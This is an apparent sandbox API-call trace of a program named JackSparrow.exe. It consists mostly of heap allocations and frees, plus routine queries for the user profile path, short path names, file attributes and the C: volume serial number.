[0026.300] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af1d8 [0026.300] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8893b8 | out: hHeap=0x770000) returned 1 [0026.300] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b07c0 [0026.300] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8893b8 [0026.300] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af1e8 [0026.300] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b4130 [0026.300] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af168 [0026.300] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x6aef00, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0026.300] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889370 [0026.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab1d0 [0026.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af148 [0026.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4130 | out: hHeap=0x770000) returned 1 [0026.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af168 | out: hHeap=0x770000) returned 1 [0026.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af1e8 | out: hHeap=0x770000) returned 1 [0026.301] GetShortPathNameW (in: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpszShortPath=0x69f344, cchBuffer=0x7fff | out: lpszShortPath="C:\\Users\\5P5NRG~1") returned 0x11 [0026.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af1e8 [0026.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b43d0 [0026.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889358 [0026.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab1d0 | out: hHeap=0x770000) returned 1 [0026.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af148 | out: hHeap=0x770000) returned 1 [0026.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889370 | out: hHeap=0x770000) returned 1 [0026.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8893b8 | out: hHeap=0x770000) returned 1 [0026.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b07c0 | out: hHeap=0x770000) returned 1 [0026.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af1d8 | out: hHeap=0x770000) returned 1 [0026.301] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b07c0 [0026.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8893b8 [0026.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af1d8 [0026.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8893b8 | out: hHeap=0x770000) returned 1 [0026.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b08b0 [0026.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8893b8 [0026.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889370 [0026.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af148 [0026.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889370 | out: hHeap=0x770000) returned 1 [0026.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b08d8 [0026.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889370 [0026.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af168 [0026.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b4130 [0026.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af188 [0026.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8892f8 [0026.302] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4130 | out: hHeap=0x770000) returned 1 [0026.302] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af188 | out: hHeap=0x770000) returned 1 [0026.302] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af168 | out: hHeap=0x770000) returned 1 [0026.302] GetShortPathNameW (in: lpszLongPath="JackSparrow.exe", lpszShortPath=0x69f344, cchBuffer=0x7fff | out: lpszShortPath="JACKSP~1.EXE") returned 0xc [0026.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af168 [0026.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0900 [0026.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889250 [0026.302] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8892f8 | out: hHeap=0x770000) returned 1 [0026.302] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889370 | out: hHeap=0x770000) returned 1 [0026.302] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b08d8 | out: hHeap=0x770000) returned 1 [0026.302] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af148 | out: hHeap=0x770000) returned 1 [0026.302] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b08d8 [0026.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889370 [0026.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af148 [0026.302] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889370 | out: hHeap=0x770000) returned 1 [0026.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0928 [0026.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889370 [0026.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8892f8 [0026.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af188 [0026.303] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8892f8 | out: hHeap=0x770000) returned 1 [0026.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0950 [0026.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8892f8 [0026.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af158 [0026.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b4130 [0026.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af178 [0026.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889130 [0026.303] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4130 | out: hHeap=0x770000) returned 1 [0026.303] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af178 | out: hHeap=0x770000) returned 1 [0026.303] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af158 | out: hHeap=0x770000) returned 1 [0026.303] GetShortPathNameW (in: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JackSparrow.exe", lpszShortPath=0x69f344, cchBuffer=0x7fff | out: lpszShortPath="C:\\Users\\5P5NRG~1\\Desktop\\JACKSP~1.EXE") returned 0x26 [0026.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af158 [0026.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3420 [0026.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8890d0 [0026.303] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889130 | out: hHeap=0x770000) returned 1 [0026.303] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8892f8 | out: hHeap=0x770000) returned 1 [0026.303] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0950 | out: hHeap=0x770000) returned 1 [0026.303] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af188 | out: hHeap=0x770000) returned 1 [0026.303] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0950 [0026.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8892f8 [0026.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af188 [0026.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889130 [0026.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8890e8 [0026.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af178 [0026.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8890e8 | out: hHeap=0x770000) returned 1 [0026.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8890e8 [0026.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af178 | out: hHeap=0x770000) returned 1 [0026.304] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0978 [0026.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889160 [0026.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af178 [0026.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889160 | out: hHeap=0x770000) returned 1 [0026.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b09a0 [0026.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889160 [0026.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889100 [0026.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af1b8 [0026.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889100 | out: hHeap=0x770000) returned 1 [0026.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b09c8 [0026.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889100 [0026.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af1f8 [0026.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af208 [0026.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b09f0 [0026.304] CharUpperBuffW (in: lpsz="TRUE_HOMEDRIVE", cchLength=0xe | out: lpsz="TRUE_HOMEDRIVE") returned 0xe [0026.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b09f0 | out: hHeap=0x770000) returned 1 [0026.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af208 | out: hHeap=0x770000) returned 1 [0026.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889118 [0026.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab1d0 [0026.304] PeekMessageW (in: lpMsg=0x6af07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af07c) returned 0 [0026.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af208 [0026.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af228 [0026.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b09f0 [0026.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889148 [0026.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af238 [0026.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889280 [0026.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af238 | out: hHeap=0x770000) returned 1 [0026.305] GetFileAttributesW (lpFileName="C:\\" (normalized: "c:")) returned 0x16 [0026.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889280 | out: hHeap=0x770000) returned 1 [0026.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889148 | out: hHeap=0x770000) returned 1 [0026.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b09f0 | out: hHeap=0x770000) returned 1 [0026.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af228 | out: hHeap=0x770000) returned 1 [0026.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af208 | out: hHeap=0x770000) returned 1 [0026.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7ed1e8 [0026.305] PeekMessageW (in: lpMsg=0x6af07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af07c) returned 0 [0026.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af208 [0026.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af228 [0026.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889148 [0026.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af228 | out: hHeap=0x770000) returned 1 [0026.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af208 | out: hHeap=0x770000) returned 1 [0026.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889280 [0026.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889148 | out: hHeap=0x770000) returned 1 [0026.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ed1e8 | out: hHeap=0x770000) returned 1 [0026.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889148 [0026.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889280 | out: hHeap=0x770000) returned 1 [0026.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab1d0 | out: hHeap=0x770000) returned 1 [0026.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889118 | out: hHeap=0x770000) returned 1 [0026.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af1f8 | out: hHeap=0x770000) returned 1 [0026.305] SetErrorMode (uMode=0x1) returned 0x0 [0026.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af1f8 [0026.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889118 [0026.305] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x69f354, nVolumeNameSize=0x7fff, lpVolumeSerialNumber=0x6af364, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x6af364*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0026.306] GetLastError () returned 0x3f0 [0026.306] SetLastError (dwErrCode=0x3f0) [0026.306] GetLastError () returned 0x3f0 [0026.306] SetLastError (dwErrCode=0x3f0) [0026.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889280 [0026.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b09f0 [0026.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af208 [0026.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889118 | out: hHeap=0x770000) returned 1 [0026.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af1f8 | out: hHeap=0x770000) returned 1 [0026.306] SetErrorMode (uMode=0x0) returned 0x1 [0026.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889148 | out: hHeap=0x770000) returned 1 [0026.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889100 | out: hHeap=0x770000) returned 1 [0026.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b09c8 | out: hHeap=0x770000) returned 1 [0026.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af1b8 | out: hHeap=0x770000) returned 1 [0026.307] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b09c8 [0026.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889100 [0026.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af1b8 [0026.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889100 | out: hHeap=0x770000) returned 1 [0026.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4408 [0026.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889100 [0026.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889148 [0026.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af1f8 [0026.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889148 | out: hHeap=0x770000) returned 1 [0026.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889148 [0026.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af228 [0026.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae788 [0026.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889118 [0026.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af238 [0026.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x250) returned 0x7b5348 [0026.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889118 | out: hHeap=0x770000) returned 1 [0026.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889118 [0026.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6f0) returned 0x7b55a0 [0026.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b5348 | out: hHeap=0x770000) returned 1 [0026.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889118 | out: hHeap=0x770000) returned 1 [0026.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889118 [0026.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889118 | out: hHeap=0x770000) returned 1 [0026.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889118 [0026.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889118 | out: hHeap=0x770000) returned 1 [0026.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889118 [0026.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe20) returned 0x7b5c98 [0026.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b55a0 | out: hHeap=0x770000) returned 1 [0026.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889118 | out: hHeap=0x770000) returned 1 [0026.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889118 [0026.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889118 | out: hHeap=0x770000) returned 1 [0026.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889118 [0026.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889118 | out: hHeap=0x770000) returned 1 [0026.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae788 | out: hHeap=0x770000) returned 1 [0026.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af228 | out: hHeap=0x770000) returned 1 [0026.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af1f8 | out: hHeap=0x770000) returned 1 [0026.308] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0a18 [0026.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889118 [0026.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af1f8 [0026.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889118 | out: hHeap=0x770000) returned 1 [0026.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0a40 [0026.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889118 [0026.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889298 [0026.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af228 [0026.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889298 | out: hHeap=0x770000) returned 1 [0026.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0a68 [0026.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889298 [0026.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af248 [0026.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8892e0 [0026.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af248 | out: hHeap=0x770000) returned 1 [0026.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8892b0 [0026.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af248 [0026.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889310 [0026.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af248 | out: hHeap=0x770000) returned 1 [0026.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8892c8 [0026.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af248 [0026.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889268 [0026.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af248 | out: hHeap=0x770000) returned 1 [0026.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889238 [0026.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af248 [0026.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x58) returned 0x794ad0 [0026.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4c) returned 0x7f33c8 [0026.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0a90 [0026.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889208 [0026.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af258 [0026.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889208 | out: hHeap=0x770000) returned 1 [0026.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ab8 [0026.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae788 [0026.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889238 | out: hHeap=0x770000) returned 1 [0026.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0026.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac290 [0026.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af268 [0026.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889238 [0026.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af278 [0026.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889208 [0026.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af288 [0026.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0026.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af298 [0026.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0026.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af2a8 [0026.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0026.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2a8 | out: hHeap=0x770000) returned 1 [0026.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x12) returned 0x7ae7a8 [0026.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0026.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ae0 [0026.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae7a8 | out: hHeap=0x770000) returned 1 [0026.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4478 [0026.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889238 | out: hHeap=0x770000) returned 1 [0026.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889238 [0026.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af2a8 [0026.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889238 | out: hHeap=0x770000) returned 1 [0026.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2a8 | out: hHeap=0x770000) returned 1 [0026.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ae0 | out: hHeap=0x770000) returned 1 [0026.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af298 | out: hHeap=0x770000) returned 1 [0026.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889208 | out: hHeap=0x770000) returned 1 [0026.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af288 | out: hHeap=0x770000) returned 1 [0026.310] 